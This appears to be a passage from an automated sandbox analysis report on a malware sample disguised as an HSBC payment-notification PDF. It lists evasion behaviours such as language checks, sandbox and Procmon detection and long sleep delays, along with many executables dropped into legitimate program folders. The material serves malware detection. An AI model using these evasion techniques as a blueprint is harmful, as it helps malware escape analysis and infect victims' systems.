              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Contains functionality to behave differently if execute on a Russian/Kazak computer
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_00995346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00995346
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_02285346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_02285346
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 14_2_00B95346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 14_2_00B95346
              Source: C:\Windows\System32\Spectrum.exeCode function: 20_2_00725346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_00725346
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 22_2_00D15346 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 22_2_00D15346
              Found evasive API chain (may stop execution after checking computer name)
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleepgraph_0-180369
              Found evasive API chain (may stop execution after checking volume information)
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,Sleepgraph_0-180368
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI/Special instruction interceptor: Address: AC250C
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312813211.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1310393083.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346748360.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312666727.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1311236894.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1312018188.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.1310508086.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE=
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598565Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597768Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597307Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596568Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596349Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595923Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595779Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595561Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594888Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593683Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593524Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593354Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593086Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592959Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 592387Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2903Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6913Jump to behavior
              Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 483Jump to behavior
              Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 7782
              Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 2216
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
